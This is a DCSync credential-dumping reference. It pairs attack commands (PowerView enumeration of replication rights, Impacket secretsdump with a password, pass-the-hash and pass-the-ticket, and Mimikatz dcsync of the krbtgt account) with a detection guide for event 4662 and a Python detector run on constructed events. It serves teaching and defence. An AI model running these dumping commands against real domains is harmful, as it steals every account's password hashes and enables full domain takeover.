DCSync

MITRE ATT&CK T1003.006

Dump Password Hashes from Domain Controller

DCSync is a credential dumping technique: the adversary simulates the replication behaviour of a Domain Controller and asks another DC to replicate account data (including password hashes) over MS-DRSR, the Directory Replication Service Remote Protocol. It cannot be disabled, because MS-DRSR is a required service of Active Directory.

This attack requires domain admin privileges, specifically the replication rights DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain object. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default.

Enumeration

Get-ObjectAcl -DistinguishedName "dc=dc1,dc=local" -ResolveGUIDs | ?{ $_.ObjectType -match 'ds-replication-get-changes' }

Impacket: secretsdump

# using a plaintext password (secretsdump target syntax is domain/user:password@target)
secretsdump.py -outputfile 'file.name' 'domain'/'User':'PASSWORD'@'Domain Controller IP'
# -just-dc limits extraction to the NTDS.dit secrets pulled over replication
secretsdump.py -just-dc administrator/fkclai-win2016\$@192.168.1.169

# with Pass-the-Hash
secretsdump.py -outputfile 'file.name' -hashes 'LMhash':'NThash' 'domain'/'User'@'Domain Controller IP'

# with Pass-the-Ticket (Kerberos ticket taken from the KRB5CCNAME cache; -no-pass skips the password prompt)
secretsdump.py -k -no-pass -outputfile 'file.name' 'domain'/'User'@'Domain Controller IP'

Mimikatz

Example (dc01 is the domain, krbtgt is the account whose secrets are requested):

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dc01\krbtgt"'

Detection

Monitor Windows Security Event ID 4662 (an operation was performed on an Active Directory object) and alert when its Properties field contains one of the replication control access right GUIDs: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes), 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes-All) or 89e95b76-444d-4c62-991a-0facbeda640c (DS-Replication-Get-Changes-In-Filtered-Set). Domain controller machine accounts generate these events during normal replication, so filter them out and alert on any other account. The "Audit Directory Service Access" subcategory must be enabled for 4662 events to be logged at all.
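Detection logic for the rule above, as an added Python example that is not part of these notes: it scans 4662 records (assumed to have been exported already as dictionaries carrying the standard event fields SubjectUserName, SubjectDomainName, ObjectName and Properties), maps any replication-right GUID found in Properties to its name, and suppresses the domain controllers' own machine accounts, which replicate legitimately. The sample events, the CORP domain and every account name in them are constructed, not captured telemetry.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662 records.

Added example, not code from the original notes. Assumes 4662 events have been
exported as dicts with the standard field names; the events below are constructed.
"""
import re

# Control access right GUIDs that appear in the Properties field of a 4662 event
# when an account asks a DC for directory replication.
REPLICATION_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Properties is a whitespace separated list of GUIDs (optionally in braces) plus
# resource-string markers such as %%7688; this pulls out just the GUIDs.
GUID_RE = re.compile(r"\{?([0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12})\}?", re.I)

# Machine accounts of the domain's DCs (constructed names); these replicate legitimately.
DC_ACCOUNTS = {"DC01$", "DC02$"}


def replication_rights(properties):
    """Return the replication right names referenced in a 4662 Properties field, in order."""
    found = []
    for guid in GUID_RE.findall(properties):
        name = REPLICATION_GUIDS.get(guid.lower())
        if name and name not in found:
            found.append(name)
    return found


def is_expected_replicator(subject_user, dc_accounts):
    """True when the requesting account is one of the known DC machine accounts."""
    return subject_user.lower() in {a.lower() for a in dc_accounts}


def detect_dcsync(events, dc_accounts):
    """Return one alert per 4662 event in which a non-DC account requested replication rights."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue  # ordinary directory access, not a replication request
        if is_expected_replicator(ev.get("SubjectUserName", ""), dc_accounts):
            continue  # normal DC-to-DC replication
        alerts.append({
            "user": f"{ev.get('SubjectDomainName', '')}\\{ev.get('SubjectUserName', '')}",
            "rights": rights,
            "object": ev.get("ObjectName", ""),
        })
    return alerts


# Constructed sample events (not real telemetry). Properties strings imitate the
# layout Windows writes: an access-type marker followed by the requested GUIDs.
SAMPLE_EVENTS = [
    {   # DC02's own machine account replicating from DC01: expected, no alert.
        "EventID": 4662, "SubjectUserName": "DC02$", "SubjectDomainName": "CORP",
        "ObjectName": "DC=corp,DC=example",
        "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # A user account requesting Get-Changes and Get-Changes-All: DCSync indicator.
        "EventID": 4662, "SubjectUserName": "jsmith", "SubjectDomainName": "CORP",
        "ObjectName": "DC=corp,DC=example",
        "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # Unrelated 4662 (some other property GUID, constructed): ignored.
        "EventID": 4662, "SubjectUserName": "svc-backup", "SubjectDomainName": "CORP",
        "ObjectName": "CN=jsmith,CN=Users,DC=corp,DC=example",
        "Properties": "%%7688 {bf967aba-0de6-11d0-a285-00aa003049e2}",
    },
    {   # Different event ID entirely: ignored.
        "EventID": 4624, "SubjectUserName": "jsmith", "SubjectDomainName": "CORP",
        "Properties": "",
    },
]


if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(f"DCSync indicator: {alert['user']} requested {', '.join(alert['rights'])} on {alert['object']}")
```

The suppression list should be built from the domain's actual DC computer accounts (and any sanctioned replication service accounts); a tighter rule also checks that the subject account appears in the 4662 event on a domainDNS object rather than on individual user objects.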
